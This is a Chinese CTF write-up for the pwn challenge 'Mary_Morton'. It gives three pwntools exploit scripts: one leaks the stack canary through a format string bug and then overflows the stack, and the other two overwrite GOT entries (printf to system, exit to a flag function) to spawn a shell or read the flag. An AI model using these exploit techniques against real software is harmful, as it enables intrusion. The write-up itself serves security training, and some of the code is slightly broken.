pwn之Mary_Morton

1.题目

1.1.保护机制

NX和canary

1.2.关键代码

两个函数，一个格式化字符串漏洞，一个栈溢出漏洞

2.思路1

由于开启了canary机制，导致栈溢出不能轻易利用，但是由于有个格式化字符串的存在导致canary的泄漏，所以可以通过泄漏来进行栈溢出漏洞利用。
重点：计算canary的偏移的时候记住不是从栈中buffer开始记录的，buffer上面还有printf的参数
代码：

from pwn import *
from ctypes import *
import re

context(arch="amd",os="linux",log_level="debug")
con = remote('111.200.241.244',55930)
#con = process('./crack')

con.sendlineafter("battle \n",b"2")
con.sendline(b"%23$p")
canary = int(re.search(b"0x[0-9a-f]{16}",con.recv()).group(),16)

payload = b"A"*136+p(canary)+p(0x1)+p(0x4008DA)
con.sendline(b"1")
con.sendline(payload)
print(con.recvall())
con.close()

3.思路2

重点：利用格式化字符串漏洞我们可以将任意一个即将执行的函数的got替换成我们需要执行的函数的plt
所以我们可以将print_got替换成system_plt，这样再次调用print就相当于调用system，参数为/bin/sh\x00

from pwn import *

context(arch="amd",os="linux",log_level="debug")
#con = remote('111.200.241.244',55930)
con = process('./pwn')
printf_got = 0x00601030
system_plt = 0x004006A0

con.sendlineafter("battle \n","2")
payload = "a%"
payload += str(system_plt-1)
payload += "c%8$lln"
payload += p(printf_got)
con.sendline(payload)

con.sendlineafter("battle \n","2")
con.sendline("/bin/sh\x00")
con.interactive()
con.close()

4.思路3

from pwn import *

context(arch="amd",os="linux",log_level="debug")
#con = remote('111.200.241.244',55930)
con = process('./pwn')
exit_got = 0x00601060
catflag_plt = 0x004008DA

con.sendlineafter("battle \n","2")
payload = "a%"
payload += str(catflag_plt-1)
payload += "c%8$lln"
payload += p(exit_got)
con.sendline(payload)

con.sendlineafter("battle \n","3")
con.interactive()
con.close()